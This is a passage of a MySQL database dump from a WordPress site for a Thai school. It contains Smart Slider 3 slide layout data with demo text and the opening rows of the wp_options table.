2\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":90,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Text\",\"namesynced\":1,\"item\":{\"type\":\"text\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"18||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.6\\\",\\\"weight\\\":400,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"}]}\",\"style\":\"\",\"content\":\"Choose a source from the background top tab then upload an image or pick a background color.\",\"content-tablet-enabled\":\"0\",\"contenttablet\":\"\",\"content-mobile-enabled\":\"0\",\"contentmobile\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Read More\",\"namesynced\":1,\"item\":{\"type\":\"button\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"center\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"0568f6ff\\\"}]}\",\"style\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"0568f6ff\\\",\\\"opacity\\\":100,\\\"padding\\\":\\\"1|*|2|*|1|*|2|*|em\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"5\\\"},{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"ffffffff\\\"}]}\",\"content\":\"Next Slide\",\"nowrap\":\"1\",\"fullwidth\":\"0\",\"href\":\"NextSlide[]\",\"href-target\":\"_self\",\"href-rel\":\"\",\"class\":\"\",\"icon\":\"\",\"iconsize\":\"100\",\"iconspacing\":\"30\",\"iconplacement\":\"left\"}}}]},{\"type\":\"col\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"left\",\"desktopportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitorder\":0,\"mobileportraitinneralign\":\"center\",\"mobileportraitorder\":1,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-LnImbm1HgUAv\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"colwidth\":\"3/5\",\"href\":\"\",\"href-target\":\"_self\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"borderwidth\":\"0|*|0|*|0|*|0\",\"borderstyle\":\"solid\",\"bordercolor\":\"ffffffff\",\"name\":\"Column\",\"namesynced\":1,\"layers\":[{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"mobileportraitmaxwidth\":300,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Image\",\"namesynced\":1,\"item\":{\"type\":\"image\",\"values\":{\"image\":\"https://smartslider3.com/wp-content/uploads/slider424/background.png\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"size\":\"auto|*|auto\",\"alt\":\"\",\"title\":\"\",\"href-class\":\"\"}}}]}]}]}]','','https://smartslider3.com/wp-content/uploads/slider424/slidebackground.jpg','{\"type\":\"slide\",\"desktopportraitfontsize\":100,\"desktopportraitpadding\":\"10|*|60|*|10|*|60\",\"tabletportraitpadding\":\"10|*|50|*|10|*|50\",\"mobileportraitpadding\":\"10|*|10|*|35|*|10\",\"record-slides\":0,\"thumbnailType\":\"default\",\"static-slide\":0,\"slide-duration\":0,\"ligthboxImage\":\"\",\"background-animation\":\"\",\"background-animation-color\":\"333333ff\",\"background-animation-speed\":\"default\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"href\":\"\",\"href-target\":\"\",\"background-type\":\"image\",\"backgroundColor\":\"ffffff00\",\"backgroundGradient\":\"off\",\"backgroundColorEnd\":\"ffffff00\",\"backgroundColorOverlay\":0,\"backgroundImage\":\"https://smartslider3.com/wp-content/uploads/slider424/slide1.png\",\"backgroundFocusX\":50,\"backgroundFocusY\":50,\"backgroundImageOpacity\":100,\"backgroundImageBlur\":0,\"backgroundAlt\":\"\",\"backgroundTitle\":\"\",\"backgroundMode\":\"default\",\"guides\":\"eyJob3Jpem9udGFsIjpbXSwidmVydGljYWwiOltdfQ==\",\"version\":\"3.4.0\"}',1,0),
(2,'Build & Design',1,'1970-01-01 00:00:00','1970-01-01 00:00:00',1,0,'[{\"type\":\"content\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":1120,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitselfalign\":\"center\",\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-TPnUuKlAWVoC\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"layers\":[{\"type\":\"row\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"desktopportraitgutter\":0,\"desktopportraitwrapafter\":0,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"tabletportraitgutter\":20,\"mobileportraitinneralign\":\"inherit\",\"mobileportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"mobileportraitgutter\":20,\"mobileportraitwrapafter\":1,\"mobileportraitmaxwidth\":400,\"mobileportraitselfalign\":\"inherit\",\"mobilelandscapewrapafter\":1,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-NmnNQvKK01kO\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"href\":\"\",\"href-target\":\"_self\",\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"ffffff00\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"borderwidth\":\"1|*|1|*|1|*|1\",\"borderstyle\":\"none\",\"bordercolor\":\"FFFFFFFF\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"fullwidth\":1,\"stretch\":0,\"name\":\"Row\",\"namesynced\":1,\"cols\":[{\"type\":\"col\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"left\",\"desktopportraitpadding\":\"10|*|10|*|10|*|10|*|px\",\"desktopportraitorder\":0,\"tabletportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"mobileportraitmaxwidth\":0,\"mobileportraitinneralign\":\"left\",\"mobileportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"mobileportraitorder\":2,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-R5Jkk06Nmzr4\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"colwidth\":\"2/5\",\"href\":\"\",\"href-target\":\"_self\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"borderwidth\":\"0|*|0|*|0|*|0\",\"borderstyle\":\"solid\",\"bordercolor\":\"ffffffff\",\"name\":\"Column\",\"namesynced\":1,\"layers\":[{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":60,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Jeans Store Interior\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"36||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.2\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"02. Build & Design\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Lorem ipsum dolor sit amet, consect\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"24||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"weight\\\":300,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Build any layout with layers and customize your designs limitlessly.\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":100,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Latest Project\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffdb\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"uppercase\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Step 1\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":90,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Text\",\"namesynced\":1,\"item\":{\"type\":\"text\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"18||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.6\\\",\\\"weight\\\":400,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"}]}\",\"style\":\"\",\"content\":\"To add a layer, click the green plus button in the left sidebar and select the type of layer.\",\"content-tablet-enabled\":\"0\",\"contenttablet\":\"\",\"content-mobile-enabled\":\"0\",\"contentmobile\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":100,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Latest Project\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffdb\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"uppercase\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Step 2\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":90,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Text\",\"namesynced\":1,\"item\":{\"type\":\"text\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"18||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.6\\\",\\\"weight\\\":400,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"}]}\",\"style\":\"\",\"content\":\"Select any layer and you can edit its content and style properties in the layer window.\",\"content-tablet-enabled\":\"0\",\"contenttablet\":\"\",\"content-mobile-enabled\":\"0\",\"contentmobile\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Read More\",\"namesynced\":1,\"item\":{\"type\":\"button\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"center\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"0568f6ff\\\"}]}\",\"style\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"0568f6ff\\\",\\\"opacity\\\":100,\\\"padding\\\":\\\"1|*|2|*|1|*|2|*|em\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"5\\\"},{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"ffffffff\\\"}]}\",\"content\":\"Next Slide\",\"nowrap\":\"1\",\"fullwidth\":\"0\",\"href\":\"NextSlide[]\",\"href-target\":\"_self\",\"href-rel\":\"\",\"class\":\"\",\"icon\":\"\",\"iconsize\":\"100\",\"iconspacing\":\"30\",\"iconplacement\":\"left\"}}}]},{\"type\":\"col\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"left\",\"desktopportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitorder\":0,\"mobileportraitinneralign\":\"center\",\"mobileportraitorder\":1,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-iYi6ZKk8yeVp\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"colwidth\":\"3/5\",\"href\":\"\",\"href-target\":\"_self\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"borderwidth\":\"0|*|0|*|0|*|0\",\"borderstyle\":\"solid\",\"bordercolor\":\"ffffffff\",\"name\":\"Column\",\"namesynced\":1,\"layers\":[{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"mobileportraitmaxwidth\":300,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Image\",\"namesynced\":1,\"item\":{\"type\":\"image\",\"values\":{\"image\":\"https://smartslider3.com/wp-content/uploads/slider424/buildanddesign.png\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"size\":\"auto|*|auto\",\"alt\":\"\",\"title\":\"\",\"href-class\":\"\"}}}]}]}]}]','','https://smartslider3.com/wp-content/uploads/slider424/buildanddesign.jpg','{\"type\":\"slide\",\"desktopportraitfontsize\":100,\"desktopportraitpadding\":\"10|*|60|*|10|*|60\",\"tabletportraitpadding\":\"10|*|50|*|10|*|50\",\"mobileportraitpadding\":\"10|*|10|*|35|*|10\",\"record-slides\":0,\"thumbnailType\":\"default\",\"static-slide\":0,\"slide-duration\":0,\"ligthboxImage\":\"\",\"background-animation\":\"\",\"background-animation-color\":\"333333ff\",\"background-animation-speed\":\"default\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"href\":\"\",\"href-target\":\"\",\"background-type\":\"image\",\"backgroundColor\":\"ffffff00\",\"backgroundGradient\":\"off\",\"backgroundColorEnd\":\"ffffff00\",\"backgroundColorOverlay\":0,\"backgroundImage\":\"https://smartslider3.com/wp-content/uploads/slider424/slide2.png\",\"backgroundFocusX\":50,\"backgroundFocusY\":50,\"backgroundImageOpacity\":100,\"backgroundImageBlur\":0,\"backgroundAlt\":\"\",\"backgroundTitle\":\"\",\"backgroundMode\":\"default\",\"guides\":\"eyJob3Jpem9udGFsIjpbXSwidmVydGljYWwiOltdfQ==\",\"version\":\"3.4.0\"}',2,0);
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=99005 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES
(1,'siteurl','http://pakhaeng.ssk.in.th','yes'),
(2,'home','http://pakhaeng.ssk.in.th','yes'),
(3,'blogname','โรงเรียนบ้านหนองปลาเข็ง-กอไหล่','yes'),
(4,'blogdescription','สพป ศรีสะเกษ เขต 1','yes'),
(5,'users_can_register','0','yes'),
(6,'admin_email','patcharapol@ro.ac.th','yes'),
(7,'start_of_week','1','yes'),
(8,'use_balanceTags','0','yes'),
(9,'use_smilies','1','yes'),
(10,'require_name_email','','yes'),
(11,'comments_notify','','yes'),
(12,'posts_per_rss','12','yes'),
